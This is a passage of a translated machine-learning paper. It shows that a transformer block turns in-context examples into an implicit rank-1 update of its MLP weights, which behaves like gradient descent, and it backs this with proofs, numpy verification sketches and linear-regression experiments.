[Translation] Learning without training: the implicit dynamics of in-context learning

Abstract

One of the most striking features of Large Language Models (LLMs) is their ability to learn in context. Specifically, at inference time an LLM can pick up new patterns without any additional weight update when these patterns are presented as examples in the prompt, even if they were never seen during training. The mechanisms that make this possible remain largely unknown.

In this work, we show that stacking a self-attention layer with an MLP allows the transformer block to implicitly modify the weights of the MLP layer according to the context. We argue, through theoretical analysis and experiments, that this simple mechanism may explain why LLMs can learn in context and not only during training. Specifically, we show that, under a number of simplifying assumptions, a transformer block implicitly transforms the context into a low-rank weight update of the MLP layer.

1. Introduction

Large Language Models (LLMs) and the transformer architecture have revolutionized machine learning and are likely to do the same in many other fields, including industry, science, and art. Despite this impact, the mechanisms through which LLMs acquire the emergent properties that make them so useful remain largely a theoretical mystery.

In this work we focus on the ability of an LLM to learn in context (in-context learning, ICL) after training has fully completed: the ability to learn from examples that were not in the training set but are given to the model at inference time through the prompt.

Historically, in machine learning, extracting patterns from a series of examples has been understood as a dynamic process in which the model weights are updated as the examples are consumed by an optimization procedure. In ICL, however, there is no explicit weight update that could explain the emergent dynamic nature of trained LLMs, which appear to reorganize or reconfigure themselves in response to the instructions in the user prompt.

This mysterious and extremely useful ability has led researchers to conjecture that an implicit form of weight update takes place at inference time, while the model consumes the prompt. Moreover, recent work has shown that transformer blocks can implicitly implement a form of stochastic gradient descent when processing the context.

In this work we follow this intuition of implicit weight updates but take the opposite approach. Instead of abstracting heavily and studying only simple toy models, we focus on the key properties of contextual processing and show that attention layers play a central role in it.

We consider a generalization of the transformer block that we call a contextual block. We show that layers with this contextual property, when stacked with standard neural networks, implicitly transform the context into a weight update of the very first layer of the network.

We derive an explicit formula for this implicit update, which turns out to be a rank-1 matrix. This leads us to conclude that contextual layers such as self-attention, combined with a neural network, effectively perform an implicit fine-tuning of the MLP weights, where the update is computed directly from the context.

Main contributions:

We introduce the notion of a contextual block, formed by a contextual layer stacked on top of a neural network, which generalizes the transformer block.
We show that, for contextual blocks, the output for a token in the presence of a context coincides with the output of the same network without the context but with its weight matrix updated by a low-rank matrix.
We derive an explicit formula for the implicit weight update induced by the context and analyze how the context affects the model parameters.
We connect token processing to learning dynamics: we show that consuming tokens corresponds to an implicit gradient descent in the weight space of the network.

1.1 Related work

Beyond a certain scale, LLMs can learn from examples given in the prompt. This emergent ability was first demonstrated clearly with GPT-3 [3] and was named In-Context Learning (ICL) [4].

In [12], the authors pose a fundamental question: does genuine learning take place at inference time while the model processes the prompt, or do the in-context examples merely help the model retrieve capabilities already acquired during pre-training, with no new learning at inference time?

Moreover, [13] argues that the examples in the prompt serve only as a form of Bayesian conditioning rather than actual learning. In the same direction, [14] shows that replacing the labels in the prompt examples with random labels does not significantly degrade ICL performance, which supports the hypothesis that the model retrieves knowledge acquired during pre-training rather than learning anew.

However, [15] revisits this idea and shows that, while this holds for small models, large LLMs do start to learn from randomly permuted labels in the prompt. Similarly, [16] shows that the emergence of genuine ICL also depends strongly on the diversity of the pre-training data.

On the other hand, [8] shows that transformers pre-trained on regression tasks can learn, from context alone, functions as diverse as linear functions, decision trees, and two-layer neural networks. These experiments provide a controlled setting for testing the hypothesis that genuine ICL exists.

[17] shows that transformers can learn to perform meta-optimization, that is, the model itself starts to behave as a meta-optimizer. This hypothesis is tested in [6], where (in the same controlled regression setting) a transformer with linear attention trained by gradient flow converges to a meta-optimizer and behaves like gradient descent.

Concurrently, [7], [9], and [10] exhibit theoretical mechanisms through which consuming prompt examples at inference time can be implicitly identified with gradient descent steps, realized as implicit weight updates. More recently, [11] shows that using chain-of-thought in the prompt has an effect similar to multiple steps of stochastic gradient descent.

However, all these theoretical models assume a narrow class of scenarios, for example linear layers and prompts built from regression pairs. As shown in [18] and [19], these assumptions are not realistic enough, and the authors identify discrepancies between genuine ICL and gradient descent performed by fine-tuning on the prompt examples. Most recently, [20] reported that ICL has a generalization advantage over traditional fine-tuning.

In this work we develop the view of ICL as implicit weight updates that correspond to a kind of implicit learning dynamics. However, we drop the restrictions of earlier models, which assume that in-context learning takes place in the self-attention layers. Instead, we propose a more general model in which the weight update is placed on the MLP layer of the transformer block rather than on the attention mechanism, as in [7, 9, 10].

2. Contextual blocks

In this section we abstract some key properties of transformers. In particular, we introduce the notion of a contextual layer, which generalizes the self-attention layer of transformer blocks. In this setting, a contextual block is the composition of a contextual layer with a standard neural network, generalizing the notion of a transformer block. We then prove our main theorem: the context in a contextual block acts as a low-rank fine-tuning update of the network weights. For simplicity, we state our results for a neural network without skip-connection; the case with skip-connection is similar but technically more involved and is treated in full in Appendix A.

We call a contextual layer a network layer A(⋅) that can take a single vector x as input, yielding the output A(x), or can optionally take in addition a context C (for example a sequence of tokens or an image) along with the vector x, yielding the output A([C,x]). Below we often omit the explicit concatenation [C,x] in the input of the contextual layer and simply write A(C,x) to mean A([C,x]).

As a prototypical and guiding example of a contextual layer, consider the self-attention layer of a transformer block, where the context C is an instruction prompt consisting of a sequence of context tokens C=[c_1,…,c_n] and x is the query token from which the LLM makes its prediction. Together, C and x form the contextualized input prompt [C,x]=[c_1,…,c_n,x], that is, the concatenation of the context tokens and the query token. We take A(C,x) to be the output of the self-attention layer for the last token x. Thus A(C,x) and A(x) lie in the same output vector space. Contextual layers produce contextual vectors, which lets us define the difference ΔA(C):=A(C,x)−A(x) between the layer output with and without the context.

Motivated by this generalization of the self-attention layer as a contextual layer, we now generalize the whole transformer block by introducing the contextual block:

Definition 2.1. A contextual block is the composition T_W=M_W∘A, where A is a contextual layer and M_W is a neural network; that is, M_W(z)=f_θ(Wz+b), where W and b are the weights of the first fully connected (dense) layer and f_θ(z) is the rest of the network.

The following theorem states that a contextual block transforms a subset Y⊂C of the context into an implicit update of the network weights, so that W becomes W+ΔW(Y), where the information contained in Y is carried into the weights by the update ΔW(Y). In a sense, contextual layers load into the network weights the parameters corresponding to the context portion Y by implicitly adding the low-rank update ΔW(Y) to the weights. Namely, the output of the contextual block on the full context C coincides with the output of the same block on the context $C\setminus Y$ ¹, where Y has been removed from C but folded into the weights through the update ΔW(Y).

Theorem 2.2. Consider a contextual block T_W=M_W∘A as above, formed by a contextual layer A and a fully connected layer M_W with weight matrix W. For a given context C and input x, the effect of a portion Y⊂C of the context on the output of the contextual block implicitly corresponds to a rank-1 weight update W+ΔW(Y) of the first layer of M_W. Namely,

$T_{W}(C,x) = T_{\,W+\Delta W(Y)}\!\bigl(C\setminus Y,\, x\bigr)$ $\text{where }\; \Delta W(Y) = \frac{\bigl(W\,\Delta A(Y)\bigr)\,A(C\setminus Y,x)^T} {\|A(C\setminus Y,x)\|^{2}} , \tag{1}$

where $\Delta A(Y)=A(C,x)-A(C\setminus Y,x)$ is the context vector associated with Y. Note that ΔW(Y) has rank 1, since WΔA(Y) is a column vector and $A(C\setminus Y,x)^T$ is a row vector.

Proof. The statement follows from a direct computation, using the notation M_W(z)=f_θ(Wz+b), where W and b are the weights of the first dense layer of the network M and f_θ is the rest of the network. In this notation we have, by definition,

$T_{\,W+\Delta W(Y)}\!\bigl(C\setminus Y, x\bigr) = M_{\,W+\Delta W(Y)}\!\left(A(C\setminus Y, x)\right) \tag{2}$ $= f_{\theta}\!\left((W+\Delta W(Y))\,A(C\setminus Y, x) + b\right) \tag{3}$ $= f_{\theta}\!\left( W\,A(C\setminus Y, x) + \Delta W(Y)\,A(C\setminus Y, x) + b \right). \tag{4}$

Substituting ΔW(Y) from its definition in equation (1) and using the identity $\frac{z^T}{\lVert z\rVert^{2}}\, z = 1$, we obtain

$T_{\,W+\Delta W(Y)}\!\bigl(C\setminus Y, x\bigr) = f_{\theta}\!\left( W\,A(C\setminus Y, x) + \frac{(W\,\Delta A(Y))\,A(C\setminus Y, x)^T} {\|A(C\setminus Y, x)\|^{2}}\,A(C\setminus Y, x) + b \right) \tag{5}$ $= f_{\theta}\!\left( W\big(A(C\setminus Y, x) + \Delta A(Y)\big) + b \right) \tag{6}$

Since, by definition of the context vector, $A(C\setminus Y,x)+\Delta A(Y)=A(C,x)$, we finally get

$T_{\,W+\Delta W(Y)}\!\bigl(C\setminus Y, x\bigr) = f_{\theta}\!\left(W\,A(C,x)+b\right) = M_{W}\!\left(A(C,x)\right) = T_{W}(C,x) \tag{7}$
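The identity proved above can be checked numerically on a toy contextual block. The sketch below is only an illustration under stated assumptions: the single-head softmax attention, the ReLU MLP, the dimensions, the choice of Y, and all names (`attention`, `mlp`, `block`, `Y_idx`) are hypothetical and are not the setup used in the paper.

```python
import numpy as np

rng = np.random.default_rng(0)
d, hidden, n = 4, 8, 6  # token size, MLP width, context length (arbitrary)

# Hypothetical single-head softmax self-attention standing in for the contextual layer A.
Wq, Wk, Wv = (rng.normal(size=(d, d)) for _ in range(3))

def attention(tokens):
    """tokens: (m, d) array whose last row is the query token x. Returns A(C, x)."""
    q = tokens[-1] @ Wq
    scores = (tokens @ Wk) @ q / np.sqrt(d)
    weights = np.exp(scores - scores.max())
    weights /= weights.sum()
    return weights @ (tokens @ Wv)

# M_W(z) = f_theta(W z + b); here f_theta is ReLU followed by a linear map (an assumption).
W = rng.normal(size=(hidden, d))
b = rng.normal(size=hidden)
W_out = rng.normal(size=(d, hidden))

def mlp(z, W):
    return W_out @ np.maximum(W @ z + b, 0.0)

def block(tokens, W):
    """Contextual block T_W = M_W o A."""
    return mlp(attention(tokens), W)

C = rng.normal(size=(n, d))   # context tokens c_1..c_n
x = rng.normal(size=d)        # query token
Y_idx = [1, 3]                # part of the context to move into the weights
keep = [i for i in range(n) if i not in Y_idx]

full = np.vstack([C, x])            # [C, x]
reduced = np.vstack([C[keep], x])   # [C \ Y, x]

a_red = attention(reduced)
delta_A = attention(full) - a_red                          # context vector Delta A(Y)
delta_W = np.outer(W @ delta_A, a_red) / (a_red @ a_red)   # equation (1)

out_context = block(full, W)               # T_W(C, x)
out_patched = block(reduced, W + delta_W)  # T_{W + Delta W(Y)}(C \ Y, x)
max_err = float(np.max(np.abs(out_context - out_patched)))
rank = int(np.linalg.matrix_rank(delta_W))
print(max_err, rank)
```

The two outputs agree up to floating-point error, and the update is an outer product of a column and a row, so its numerical rank is 1. Nothing here depends on the attention being softmax attention: any function of the token sequence could replace `attention`.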

Remark 2.3. Our theorem states that any contextual layer produces an implicit weight transfer from the prompt to the first layer of the network, thereby implicitly modifying the behavior of the pre-trained network. Among possible contextual layers (for example self-attention, RNNs, or recurrent layers with local attention as in [21]), some may be better than others at producing useful weight modifications. It would be interesting to evaluate the generative power of a contextual layer in terms of the specific form of implicit weight updates given by our theorem and the structure of A imposed by the contextual layer.

Note that for Y=C (the full context) the theorem gives a formula for moving all of the context information into the weight matrix W; namely:

Corollary 2.3.1. In the notation above, the full context C can be transferred to the network weights by the following update:

$T_{W}(C,x) = T_{\,W+\Delta W(C)}(x), \quad \text{with }\; \Delta W(C) = \frac{(W\,\Delta A)\,A(x)^{T}}{\|A(x)\|^{2}} , \tag{8}$

where ΔA=A(C,x)−A(x) is the context vector and ΔW(C) has rank 1, since WΔA is a column vector and A(x)^T is a row vector.

Remark 2.4. The weight-transfer formula (1) can be rewritten in terms of union/concatenation of contexts by setting $D=C\setminus Y$; then

$T_{W}(D \cup Y, x) = T_{\,W+\Delta W(Y)}(D, x). \tag{9}$

In Appendix A we generalize Theorem 2.2 to networks with skip-connections, as is typical of standard transformer blocks. In Section 4 we verify the theoretical results experimentally on a standard concrete example.

3. The implicit learning dynamics of ICL

When the context C=[c_1,…,c_n] is a sequence of tokens, applying Corollary 2.3.1 iteratively reveals an implicit learning dynamics generated by the effect of each context token on the output of the contextual block. Starting from the initial weight matrix W_0 of the first fully connected layer of the network M_W, we can consider the weight updates that correspond to adding one token at a time to the context:

$T_{W_{0}}\!\bigl(c_{1}, x\bigr) = T_{\,W_{0}+\Delta W_{0}(c_{1})}\!(x)$ $T_{W_{0}}\!\bigl(c_{1}, c_{2}, x\bigr) = T_{\,W_{0}+\Delta W_{0}(c_{1}, c_{2})}\!(x)$ $\begin{aligned} &\vdots\\ T_{W_{0}}(c_{1},\ldots,c_{n},x) &= T_{\,W_{0}+\Delta W_{0}(c_{1},\ldots,c_{n})}(x) \end{aligned}$

This gives the following sequence of context weights:

$W_{1} = W_{0} + \Delta W_{0}(c_{1}) \tag{10}$ $W_{2} = W_{0} + \Delta W_{0}(c_{1}, c_{2}) \tag{11}$ $\begin{gather} \vdots \tag{12}\\ W_{n} = W_{0} + \Delta W_{0}(c_{1},\ldots,c_{n}) \tag{13} \end{gather}$

which, by construction, converges to the effect of the full context on the MLP weights; namely

$T_{W_{n}}(x) = T_{W_{0}}(c_{1},\ldots,c_{n},x). \tag{14}$
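The sequence of context weights in (10)–(13) can be built explicitly for a toy block. This is a minimal sketch under assumptions: the softmax attention `A`, the `tanh` stand-in for f_θ, the dimensions, and the helper names are hypothetical, chosen only to make the construction concrete.

```python
import numpy as np

rng = np.random.default_rng(1)
d, hidden, n = 3, 5, 8

# Hypothetical toy attention weights and first MLP layer (W0, b).
Wq, Wk, Wv = (rng.normal(size=(d, d)) for _ in range(3))
W0 = rng.normal(size=(hidden, d))
b = rng.normal(size=hidden)

def A(context, x):
    """Softmax attention output at the query token x; context has shape (m, d), m >= 0."""
    tokens = np.vstack([context, x])
    scores = (tokens @ Wk) @ (x @ Wq) / np.sqrt(d)
    w = np.exp(scores - scores.max())
    return (w / w.sum()) @ (tokens @ Wv)

def T(W, context, x):
    """Contextual block T_W = M_W o A, with tanh standing in for f_theta."""
    return np.tanh(W @ A(context, x) + b)

C = rng.normal(size=(n, d))
x = rng.normal(size=d)
no_context = C[:0]          # empty context, shape (0, d)
a_x = A(no_context, x)      # A(x)

def delta_W0(i):
    """Delta W_0(c_1, ..., c_i) from Corollary 2.3.1 (zero matrix for i = 0)."""
    return np.outer(W0 @ (A(C[:i], x) - a_x), a_x) / (a_x @ a_x)

# W_0, W_1, ..., W_n as in (10)-(13).
weights = [W0 + delta_W0(i) for i in range(n + 1)]

# For every prefix length i, T_{W_i}(x) should match T_{W_0}(c_1..c_i, x).
gaps = [float(np.max(np.abs(T(weights[i], no_context, x) - T(W0, C[:i], x))))
        for i in range(n + 1)]
print(max(gaps))
```

Each W_i reproduces, without any context, the output that W_0 gives on the first i context tokens; the last entry is identity (14).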

The following proposition shows that this implicit learning dynamics resembles online gradient descent, where the tokens play the role of training examples and the loss function changes at each step depending on the token being considered.

Proposition 3.1. In the notation above, the iterative weight update process can be written as stochastic gradient descent steps

$W_{i+1} = W_i - h\, \nabla_{W} L_i\!\left(W_i\right) \tag{15}$

where the learning rate is $h = 1/\lVert A(x)\rVert^{2}$ and the loss at step i is given by

$L_i(W) = \operatorname{trace}\!\big(\Delta_i^{T} W\big), \tag{16}$

with $\Delta_i = W_{0}\Big( A(c_{1},\ldots,c_{i},x) - A(c_{1},\ldots,c_{i+1},x) \Big)\, A(x)^{T}.$

Proof. First, for the sequence W_i defined in (10)–(13), we have

$W_{i+1} - W_{i} = \Delta W_{0}(c_{1},\ldots,c_{i+1}) - \Delta W_{0}(c_{1},\ldots,c_{i}) \tag{17}$ $= \frac{\,W_{0}\Big(A(c_{1},\ldots,c_{i+1},x)-A(c_{1},\ldots,c_{i},x)\Big)\,A(x)^{T}\,} {\lVert A(x)\rVert^{2}} \tag{18}$ $= -\,h\,\Delta_i, \tag{19}$

where $h = 1/\lVert A(x)\rVert^{2}$ and $\Delta_i = W_{0}\Big( A(c_{1},\ldots,c_{i},x) - A(c_{1},\ldots,c_{i+1},x) \Big)\, A(x)^{T}.$

Hence

$W_{i+1} = W_i - h\,\Delta_i = W_i - h\,\nabla_{W}\,\operatorname{trace}\!\big(\Delta_i^{T} W\big), \tag{20}$

since in general $\nabla_{W}\,\operatorname{trace}\!\big(A^{T}W\big) = A$ for any matrix $A$ of the same shape as $W$ (here $A$ is a generic matrix, not the contextual layer), because $\operatorname{trace}(A^{T}W)=\sum_{j,k}A_{jk}W_{jk}$.

Note that Δ_i measures the effect of adding the token $c_{i+1}$ to the partial context c_1,…,c_i. If $c_{i+1}$ has no effect on the output, that is, $A(c_1,\ldots,c_i,x)-A(c_1,\ldots,c_{i+1},x)=0$, then the corresponding update ∇_W L_i(W)=Δ_i vanishes. Figure 2 shows, in a simple experiment, that these gradients vanish as the learning dynamics converges toward the full context.
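The two facts used in the proof, the step identity (17)–(19) and the gradient of the linear loss (16), can be checked numerically. The sketch below assumes a hypothetical toy softmax attention `A` and random weights; the finite-difference helper `numerical_grad` is an illustration and is not part of the paper.

```python
import numpy as np

rng = np.random.default_rng(2)
d, hidden, n = 3, 4, 6

# Hypothetical toy contextual layer and first-layer weights W0.
Wq, Wk, Wv = (rng.normal(size=(d, d)) for _ in range(3))
W0 = rng.normal(size=(hidden, d))

def A(context, x):
    """Softmax attention output at the query token x given context rows."""
    tokens = np.vstack([context, x])
    scores = (tokens @ Wk) @ (x @ Wq) / np.sqrt(d)
    w = np.exp(scores - scores.max())
    return (w / w.sum()) @ (tokens @ Wv)

C = rng.normal(size=(n, d))
x = rng.normal(size=d)
a_x = A(C[:0], x)
h = 1.0 / (a_x @ a_x)  # learning rate h = 1 / ||A(x)||^2

def W_at(i):
    """W_i = W_0 + Delta W_0(c_1..c_i), as in (10)-(13)."""
    return W0 + h * np.outer(W0 @ (A(C[:i], x) - a_x), a_x)

def Delta(i):
    """Delta_i = W_0 (A(c_1..c_i, x) - A(c_1..c_{i+1}, x)) A(x)^T."""
    return np.outer(W0 @ (A(C[:i], x) - A(C[:i + 1], x)), a_x)

def loss(W, i):
    """L_i(W) = trace(Delta_i^T W), equation (16)."""
    return np.trace(Delta(i).T @ W)

def numerical_grad(W, i, eps=1e-6):
    """Central finite differences of L_i with respect to each entry of W."""
    g = np.zeros_like(W)
    for r in range(W.shape[0]):
        for c in range(W.shape[1]):
            E = np.zeros_like(W)
            E[r, c] = eps
            g[r, c] = (loss(W + E, i) - loss(W - E, i)) / (2 * eps)
    return g

# Step identity: W_{i+1} = W_i - h * Delta_i.
step_ok = all(np.allclose(W_at(i + 1), W_at(i) - h * Delta(i)) for i in range(n))
# Gradient identity: grad_W L_i(W) = Delta_i.
grad_ok = all(np.allclose(numerical_grad(W_at(i), i), Delta(i), atol=1e-6)
              for i in range(n))
print(step_ok, grad_ok)
```

Because L_i is linear in W, its gradient does not depend on the point at which it is evaluated, which is why each step is fully determined by the next token.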

Remark 3.2. Interestingly, one can derive a different but similar implicit learning dynamics W_0,W_1,…,W_n by considering partial updates that, at each step, leave the output of the contextual block unchanged when used together with the remaining tokens: $T_{W_{i}}\!\bigl(c_{i+1}, \ldots, c_{n}, x\bigr) = T_{W_{0}}\!\bigl(c_{1}, \ldots, c_{n}, x\bigr).$ This dynamics is described in Appendix B. The difference is that, in general, it can no longer be written as gradient steps, but it leads to a factorization formula for the final weight matrix W_n such that $T_{W_{n}}(x) = T_{W_{0}}(c_{1},\ldots,c_{n},x).$

4. Experiments

To test Theorem 2.2 in practice, we consider a well-defined problem: learning a function class from in-context examples. This task was studied independently in [6, 22]. Those works show that a transformer can be trained from scratch to learn linear functions in context. In other words, once a transformer has been trained on a class of linear functions, it can learn new, previously unseen linear functions (drawn from a distribution close to the one used in training) from the examples in the prompt alone, with performance comparable to the optimal least-squares estimator.

In [6, 22] the authors focus on how robust (or not) transformers are to distribution shifts between the training data and the prompts at inference time. That is not our goal. Since those works already established that transformers can learn linear models in context, we use a similar experimental protocol to verify that in-context prompts can be transferred into a weight update via equation (8). We check that the prediction of the trained model given an in-context prompt is identical to the prediction of the model with MLP weights modified according to equation (8) but without access to the in-context prompt.

4.1 Setup

At a high level, following [6], we train a simple transformer on prompts made of input-output pairs of the form $(x_{1},\, h(x_{1}),\, \ldots,\, x_{N},\, h(x_{N}),\, x_{\text{query}})$, where $x_i$ and $x_{\text{query}}$ are sampled i.i.d. from a distribution D_x and the function h is sampled independently from a distribution over functions in a class $\mathcal{H}.$ In particular, we take $\mathcal{H}$ to be the class of linear functions, so that $h(x) = \langle w, x \rangle$, with $x_i,\; x_{\text{query}},\; w \sim \mathcal{N}(0, I_d).$ The goal of the in-context learner is to use a prompt of such pairs to predict $\hat{y}\!\left(x_{\text{query}}\right)$ such that $\hat{y}\!\left(x_{\text{query}}\right) \approx h\!\left(x_{\text{query}}\right).$

Each training prompt is indexed by a task $\mathcal{T}\in\mathbb{N}$ and has the form:

$P_{\mathcal{T}} = \bigl(x_{\mathcal{T},1},\, h_{\mathcal{T}}(x_{\mathcal{T},1}),\, \ldots,\, x_{\mathcal{T},N},\, h_{\mathcal{T}}(x_{\mathcal{T},N}),\, x_{\mathcal{T},\text{query}}\bigr).$

We can write such a prompt as an embedding matrix $E_{\mathcal{T}}$ such that

$E_{\mathcal{T}} := \begin{pmatrix} x_{\mathcal{T},1} & x_{\mathcal{T},2} & \cdots & x_{\mathcal{T},N} & x_{\mathcal{T},\mathrm{query}} \\ \langle w_{\mathcal{T}}, x_{\mathcal{T},1} \rangle & \langle w_{\mathcal{T}}, x_{\mathcal{T},2} \rangle & \cdots & \langle w_{\mathcal{T}}, x_{\mathcal{T},N} \rangle & 0 \end{pmatrix} \in \mathbb{R}^{(d+1)\times (N+1)}.$

In the notation of Section 2, $E_{\mathcal{T}}$ can be viewed as a contextualized input prompt, where

$C = [c_{1},\ldots,c_{N}] = \begin{pmatrix} x_{\mathcal{T},1} & x_{\mathcal{T},2} & \cdots & x_{\mathcal{T},N} \\ \langle w_{\mathcal{T}}, x_{\mathcal{T},1} \rangle & \langle w_{\mathcal{T}}, x_{\mathcal{T},2} \rangle & \cdots & \langle w_{\mathcal{T}}, x_{\mathcal{T},N} \rangle \end{pmatrix}$ $\text{and}\quad x = \begin{pmatrix} x_{\mathcal{T},\mathrm{query}}\\[2pt] 0 \end{pmatrix}$

so that $E_{\mathcal{T}}=(C,x)$. Let θ denote the model parameters. The model prediction $\hat{y}\!\left(x_{\mathcal{T},\mathrm{query}}\right)$ for the query token $x_{\mathcal{T},\mathrm{query}}$ is the last component of the output at the query token of a single transformer block², that is,

$\hat{y}\!\left(x_{\mathcal{T},\,\mathrm{query}}\right) = T_{W}(C,x)_{(d+1)} \tag{21}$

Note that with this definition the dimensions of T_W(C,x) and $T_{W+\Delta W}(x)$ agree. We train the transformer with the loss over a batch of size B,

$\hat{\mathcal{L}}(\theta) = \frac{1}{2B}\sum_{\mathcal{T}=1}^{B} \left(\hat{y}_{\mathcal{T},\mathrm{query}} - \big\langle w_{\mathcal{T}},\, x_{\mathcal{T},\mathrm{query}}\big\rangle \right)^{2}.$
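The prompt construction and the batch loss above are easy to write down concretely. The following is a sketch only: the function names `make_prompt` and `batch_loss` and the chosen sizes are hypothetical, and the sampling follows the standard normal setup described in this section.

```python
import numpy as np

def make_prompt(rng, d, N):
    """Sample one task and return its embedding matrix E of shape (d+1, N+1).

    Columns 0..N-1 hold (x_i, <w, x_i>); the last column holds (x_query, 0).
    """
    w = rng.standard_normal(d)          # task vector w ~ N(0, I_d)
    xs = rng.standard_normal((N, d))    # inputs x_1..x_N ~ N(0, I_d)
    x_query = rng.standard_normal(d)
    top = np.column_stack([xs.T, x_query])   # (d, N+1): inputs, then the query
    bottom = np.append(xs @ w, 0.0)          # (N+1,): labels, then 0 for the query
    E = np.vstack([top, bottom])
    return E, w, x_query

def batch_loss(predictions, targets):
    """Loss (1 / 2B) * sum over the batch of (y_hat - <w, x_query>)^2."""
    predictions = np.asarray(predictions, dtype=float)
    targets = np.asarray(targets, dtype=float)
    return float(np.sum((predictions - targets) ** 2) / (2 * len(targets)))

rng = np.random.default_rng(3)
d, N = 2, 5
E, w, x_query = make_prompt(rng, d, N)

# Split E into the context C and the query token x, as in Section 2.
C, x = E[:, :-1], E[:, -1]
target = float(w @ x_query)  # value the model should predict for the query
```

A trained model would read its prediction from the last component of the block output at the query column; `batch_loss` then compares those predictions with the targets.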

4.2 Verifying Theorem 2.2

Suppose the transformer has been trained on linear functions. We show that the in-context prompt can be transferred into the weight update defined by equation (8). Namely, we want to show that

$T_{W}(C,x) = T_{\,W+\Delta W}(x);$

or, equivalently,

$T_{W}\!\left( \begin{pmatrix} x_{\mathcal{T},1} & x_{\mathcal{T},2} & \cdots & x_{\mathcal{T},N} & x_{\mathcal{T},\mathrm{query}} \\ \langle w_{\mathcal{T}}, x_{\mathcal{T},1}\rangle & \langle w_{\mathcal{T}}, x_{\mathcal{T},2}\rangle & \cdots & \langle w_{\mathcal{T}}, x_{\mathcal{T},N}\rangle & 0 \end{pmatrix} \right) = T_{\,W+\Delta W}\!\left( \begin{pmatrix} x_{\mathcal{T},\mathrm{query}}\\[2pt] 0 \end{pmatrix} \right)$

where ΔW is computed via equation (8). Figure 1 compares the validation loss obtained when predicting with the in-context prompt against the one obtained with the equivalent weight update. The losses for both settings are reported per epoch; a zoomed-in portion of the plot is also shown for clarity.

4.3 Convergence of ΔW

We run experiments to understand how the weights adapt as the model processes the in-context prompt under the implicit learning dynamics described in Proposition 3.1. In particular, we want to verify that the gradient updates go to zero as the context converges.

We build a sequence $\bigl\{\, (\Delta W)_i \,\bigr\}_{i=1}^{N}$ where each (ΔW)_i is given by equations (10)–(13). That is,

$T_{W}(C_i, x) = T_{\,W+(\Delta W)_i}(x)$

where

$C_i = [c_{1},\ldots,c_{i}] = \begin{pmatrix} x_{\mathcal{T},1} & \cdots & x_{\mathcal{T},i} \\ \langle w_{\mathcal{T}}, x_{\mathcal{T},1} \rangle & \cdots & \langle w_{\mathcal{T}}, x_{\mathcal{T},i} \rangle \end{pmatrix} \quad\text{and}\quad x = \begin{pmatrix} x_{\mathcal{T},\mathrm{query}}\\[2pt] 0 \end{pmatrix}.$

Figure 1: Training and validation loss curves. Here "Validation loss (computed via ΔW)" refers to the loss computed using $T_{W+\Delta W}(x)$, that is, the prediction of the trained model given only $x_{\text{query}}$ but with MLP weights modified by ΔW as in equation (8).
Left: the training loss curve and both validation loss curves.
Right: a zoomed-in view of the validation loss computed both ways, that is, via T_W(C,x) and via $T_{W+\Delta W}(x)$.

If W_0 denotes the learned weights of the first fully connected layer, then Corollary 2.3.1 implies that for every i=1,2,…,N

$(\Delta W)_i = \frac{(W_{0}\,\Delta A_i)\,A(x)^{T}}{\lVert A(x)\rVert^{2}}, \qquad \text{where }\; \Delta A_i :=A(c_{1},\ldots,c_{i},x) - A(x).$

Intuitively, we expect the relative change in (ΔW)_i to decrease as the in-context learner processes more of the prompt. Figure 2 confirms that this is indeed the case.

For a given context C_i=[c_1,…,c_i] of length i, we plot the marginal change in (ΔW)_i caused by adding one more context token $c_{i+1}$, which yields $(\Delta W)_{i+1}$ for the context $C_{i+1}=[c_1,\ldots,c_i,c_{i+1}]$. This marginal change is measured in the L2 norm; that is, for each context length i we plot on the y-axis the quantity corresponding to the gradient updates of Proposition 3.1:

$\left\| \nabla_{W} L_i(W) \right\|_{2} = \left\|\, (\Delta W)_{i+1} - (\Delta W)_i \,\right\|_{2}.$

In Figure 2 we observe that the gradient updates decrease and vanish as the implicit learning dynamics progresses toward the full context, as expected from a converging gradient descent process.
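The quantity plotted in Figure 2 can be computed directly from the formula for (ΔW)_i. The sketch below uses a hypothetical, untrained toy attention layer with random weights, so it only shows how the marginal norms are obtained; it makes no claim about their decay, which the paper observes for a trained model.

```python
import numpy as np

rng = np.random.default_rng(4)
d, hidden, n = 3, 6, 10

# Hypothetical untrained contextual layer and first-layer weights W0.
Wq, Wk, Wv = (rng.normal(size=(d, d)) for _ in range(3))
W0 = rng.normal(size=(hidden, d))

def A(context, x):
    """Softmax attention output at the query token x given context rows."""
    tokens = np.vstack([context, x])
    scores = (tokens @ Wk) @ (x @ Wq) / np.sqrt(d)
    w = np.exp(scores - scores.max())
    return (w / w.sum()) @ (tokens @ Wv)

C = rng.normal(size=(n, d))
x = rng.normal(size=d)
a_x = A(C[:0], x)

def delta_W(i):
    """(Delta W)_i for the first i context tokens, from Corollary 2.3.1."""
    return np.outer(W0 @ (A(C[:i], x) - a_x), a_x) / (a_x @ a_x)

steps = range(1, n)
# Marginal change when token c_{i+1} is added (Frobenius norm, NumPy's default).
marginal = np.array([np.linalg.norm(delta_W(i + 1) - delta_W(i)) for i in steps])
# The difference is rank 1, so the spectral norm gives the same value.
spectral = np.array([np.linalg.norm(delta_W(i + 1) - delta_W(i), ord=2) for i in steps])
# Closed form implied by the outer-product structure.
closed_form = np.array([
    np.linalg.norm(W0 @ (A(C[:i + 1], x) - A(C[:i], x))) / np.linalg.norm(a_x)
    for i in steps
])
print(marginal)
```

Since consecutive updates share the same row factor A(x)^T, their difference is itself an outer product, which is why the norm reduces to ‖W_0(A(c_1,…,c_{i+1},x) − A(c_1,…,c_i,x))‖ / ‖A(x)‖.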

4.4 Comparison with fine-tuning

We pre-train a transformer model (a single standard transformer block without the MLP skip-connection) on examples of the same form as the prompts $E_{\mathcal{T}}$ of Section 4.1. Here we take d=2 and N=50.

For fine-tuning, we create one new test example using $\omega_{\text{test}}$, which the model has not seen during pre-training, although $\omega_{\text{test}}$ is drawn from the same distribution as all the $\omega_\tau$ used in pre-training. We denote this example $\mathcal{D}_{FT}$:

$\mathcal{D}_{FT} = \begin{pmatrix} x_{1} & \cdots & x_{M} & x_{\mathrm{test}} \\ \langle \omega_{\mathrm{test}}, x_{1} \rangle & \cdots & \langle \omega_{\mathrm{test}}, x_{M} \rangle & 0 \end{pmatrix}$

Now, for each i=1,2,…,M, we build a fine-tuning dataset by taking the first i elements of $\mathcal{D}_{FT}$ and ignoring the last column, which is our test query. That is, for all i=1,…,M:

